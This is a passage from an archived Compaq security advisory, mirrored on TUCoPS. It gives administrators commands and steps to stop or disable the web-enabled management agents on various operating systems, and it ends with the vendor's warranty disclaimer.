	- - - - 2. Run \"sh /etc/cmaweb stop\" command. To disable Web Agent  so
	it will not be started during reboot or entering multi-user mode:
	   1. Log in as \"root\".

	   2. Run \"rm /etc/rc2.d/[SK]*cmaweb\" command.

	

	Survey for Windows, Survey for NetWare, and Survey for Linux It  is  not
	possible to disable only the web-component  of  Survey  Utility.  Follow
	the instructions below to disable the full service: Survey  for  Windows
	-  -  -  From  the  command  prompt,   type   the   following   command:
	%SystemDrive%\\COMPAQ\\SURVEY\\SURVEY-U. . This will unload  the  Survey
	service and prevent it from starting up on the next reboot.
	

	Survey for NetWare  To  unload  Survey  for  NetWare  from  the  console
	screen, type the following command: UNLOAD SURVEY
	

	During the default Survey install, Survey is  automatically  started  by
	adding the line \"load SURVEY -w10 -cWed.12,7 \"  to  the  AUTOEXEC.NCF.
	To prevent Survey from automatically starting next time  the  server  is
	restarted, remove that line.
	

	Survey for Linux To stop the Survey  for  Linux  web  daemon,  type  the
	following command:
	    kill `ps -e | grep surveywebd | awk \'{print $1}\'`

	

	System Healthcheck 1.  Change  to  the  SHC  bin  directory  (  e.g.  cd
	%systemdrive%\\compaq\\shc\\bin). 2. Stop the service  by  typing  \"net
	stop cpqshc\". 3. Remove the service by typing \"shcsvc -remove\".  Note
	that the command line interface to SHC will continue to work.
	

	Compaq Power Management Agents To stop running web agent:
	      1. From the Windows Control Panel, double-click \"Services\".

	             2. In the Services dialog list box, click on \"Compaq 

	Power Management Web Agent\".
	      3. Click the \"Stop\" button to stop the Agent.

	To  prevent  the  service   from   being   restarted,   click   on   the
	\"Startup...\" button and choose \"Disabled\", and then click \"OK\"..
	

	

	OpenVMS Management Agents
	              To stop running web agent:

	      1. Log into the system account.

	                2. For V1.0 and V2.0

	$@sys$specific:[wbem]stop_webagents
	                <mailto:$@sys$specific:[wbem]stop_webagents>

	

	3.         For          V2.1          $@sys$specific:[wbem]wbem$shutdown
	<mailto:$@sys$specific:[wbem]wbem$shutdown>
	

	

	

	Compaq Management Agents and  Tools  for  Servers  for  SCO  UnixWare  7
	NonStop Clusters
	          To stop running web agent:

	    1. Login as \"root\".

	    2. Exexcute the following two command lines:

	               execute `onall /etc/init.d/cmaweb stop`

	                        `chmod 777 /etc/init.d/cmaweb 000

	

	Tru64 UNIX Management Agents
	     To stop running Web Agent:

	    1. Log in as \"root\".

	    2. Execute  \"/sbin/init.d/insightd  stop\" command.

	       To disable the Web Agents so they will not be started during 

	       reboot or when entering multi-user mode:

	    1. Log in as \"root\".

	    2. On Tru64 UNIX V4.0f and V4.0g, execute \"rm

	/sbin/rc2.d/*insightd\".
	    3. On Tru64 UNIX V5.0 and later, execute the 

	       command: \"/usr/sbin/rcmgr set INSIGHTD_CONF -1

	    To enable the Web Agents again once the Patch Kit has been

	installed:
	    1. Log in as \"root\".

	    2. On Tru64 UNIX V4.0f and V4.0g, execute the command:

	       \"ln -s /sbin/init.d/insightd/sbin/rc2.d/ Kxxinsightd\" 

	       where xx is any sequence Nb after the one used for snmpd      

	                        

	    3. On Tru64 UNIX V5.0 and later, execute the 

	       command: \"/usr/sbin/rcmgr set INSIGHTD_CONF  1\".

	

	

	Desktop and  Portable  Web-Enabled  Agents  To  remove  the  web-enabled
	components  from  the  desktop  and   portables   agents,   follow   the
	instructions below to uninstall the agents using the Add/Remove  feature
	in Windows systems, then  reinstall  the  agents  without  the  DMI  web
	components.
	

	Uninstalling Web-Enabled Desktop Agent from a Windows  9x/NT  system  1.
	From the START menu, select SETTINGS, then CONTROL PANEL.  2.  From  the
	CONTROL PANEL, select ADD/REMOVE PROGRAMS. 3. In  the  INSTALL/UNINSTALL
	tab, select \"Compaq Insight Management
	   Web Agent\".4. Click ADD/REMOVE button to remove the agent. 

	

	For desktops and  workstations,  do  not  check  \"DMI  Web  Component\"
	during the installation.
	

	To install the  Compaq  Management  Agents  for  portables  without  web
	support, select \"custom\" and then select  \"DMI  options\".  Click  on
	the \"Change\" button. Remove the  check  marks  for  \"Compaq  DMI  Web
	Agent\" and \"Compaq DMI Web Viewer\".
	 

	

	

	COMPAQ AND/OR ITS RESPECTIVE SUPPLIERS  MAKE  NO  REPRESENTATIONS  ABOUT
	THE SUITABILITY OF  THE  INFORMATION  CONTAINED  IN  THE  DOCUMENTS  AND
	RELATED GRAPHICS AND/OR  SOFTWARE  PUBLISHED  ON  THIS  SERVER  FOR  ANY
	PURPOSE. ALL SUCH DOCUMENTS AND RELATED GRAPHICS ARE PROVIDED \"AS  IS\"
	WITHOUT WARRANTY OF ANY KIND AND ARE SUBJECT TO CHANGE  WITHOUT  NOTICE.
	THE ENTIRE RISK ARISING OUT OF THEIR USE REMAINS WITH THE RECIPIENT.  IN
	NO EVENT SHALL COMPAQ AND/OR ITS RESPECTIVE SUPPLIERS BE LIABLE FOR  ANY
	DIRECT, CONSEQUENTIAL, INCIDENTAL, SPECIAL, PUNITIVE  OR  OTHER  DAMAGES
	WHATSOEVER (INCLUDING WITHOUT LIMITATION, DAMAGES FOR LOSS  OF  BUSINESS
	PROFITS, BUSINESS INTERRUPTION, OR LOSS OF BUSINESS  INFORMATION),  EVEN
	IF COMPAQ HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH